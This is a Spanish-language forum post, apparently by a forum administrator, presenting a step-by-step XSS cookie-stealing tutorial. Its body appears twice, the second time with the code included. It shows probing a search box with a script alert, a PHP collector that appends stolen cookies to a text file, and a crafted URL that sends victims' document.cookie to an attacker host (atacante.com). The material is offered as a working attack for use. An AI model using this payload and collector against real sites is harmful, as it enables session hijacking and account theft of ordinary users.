Aplicando XSS a una Web ;) --DEFACING--
Página 1 de 1.
Aplicando XSS a una Web ;) --DEFACING--
Ataque XSS
Comencemos con una pequeña introducción sobre está técnica. Pongamos un ejemplo de una
web que utilice cookies y tenga un buscador interno.
Cookies
Una cookie es un almacén de información que se guarda en el ordenador del usuario y en
cualquier momento la pagina puede pedir la información, que contiene la cookie, al
ordenador del usuario...
Ahora que sabemos que es una cookie lo que vamos a hacer es ver el nombre de la página
donde se encuentra el buscador, en nuestro caso es buscador.php
Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador,
por ejemplo:
***************************
Si salta una alarma al pulsar el botón, significa que ese buscador es vulnerable.
Suponiendo que sea vulnerable, el siguiente paso es ver el nombre del formulario y del botón.
Para esto, tenemos que ver el código fuente de dicha página y buscar algo como:
******************************************************
******************************************************
Ahora ya sabemos que el formulario se llama palabra y que el botón se llama buscar.
Para almacenar las cookies, tenemos dos opciones
1º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable).
A continuación vamos a crear una pagina en php, este archivo creará otro (archivo.txt)
cuando algún usuario caiga en el ataque y escribirá a continuación los siguientes
usuarios:
**********************************
ARCHIVO.TXT
Este archivo se creará automáticamente y será en el que se almacenen las cookies, osea,
que para ver los resultados tienes que entrar en este archivo.
Una vez hecho este paso solo tenemos que crear "LA URL" que será de la siguiente forma:
********************************************************************************
Comencemos con una pequeña introducción sobre está técnica. Pongamos un ejemplo de una
web que utilice cookies y tenga un buscador interno.
Cookies
Una cookie es un almacén de información que se guarda en el ordenador del usuario y en
cualquier momento la pagina puede pedir la información, que contiene la cookie, al
ordenador del usuario...
Ahora que sabemos que es una cookie lo que vamos a hacer es ver el nombre de la página
donde se encuentra el buscador, en nuestro caso es buscador.php
Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador,
por ejemplo:
***************************
- Código:
<script>alert()</script><br />
Si salta una alarma al pulsar el botón, significa que ese buscador es vulnerable.
Suponiendo que sea vulnerable, el siguiente paso es ver el nombre del formulario y del botón.
Para esto, tenemos que ver el código fuente de dicha página y buscar algo como:
******************************************************
- Código:
<input name="palabra" type="text">
- Código:
<input name="buscar" value="Buscar" type="submit">
******************************************************
Ahora ya sabemos que el formulario se llama palabra y que el botón se llama buscar.
Para almacenar las cookies, tenemos dos opciones
1º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable).
A continuación vamos a crear una pagina en php, este archivo creará otro (archivo.txt)
cuando algún usuario caiga en el ataque y escribirá a continuación los siguientes
usuarios:
**********************************
- Código:
<? $cookie = $_GET['cookie']; $fff = fopen("archivo.txt","a"); fwrite($fff, "$cookie \n"); fclose($fff); ?>
ARCHIVO.TXT
Este archivo se creará automáticamente y será en el que se almacenen las cookies, osea,
que para ver los resultados tienes que entrar en este archivo.
Una vez hecho este paso solo tenemos que crear "LA URL" que será de la siguiente forma:
********************************************************************************
- Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
- Código:
'http://www.atacante.com/cookies.php?cookie='+document·cookie;&buscar=;
JuNiiOr- Administrador
- Cantidad de envíos : 165
Edad : 34
Localización : chihuahua,chihuahua
Arma Favorita : Mi 45 con cachas de oro cajeta se ve endiamantada...
Respeto de las normas del foro :
Fecha de inscripción : 03/08/2008
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.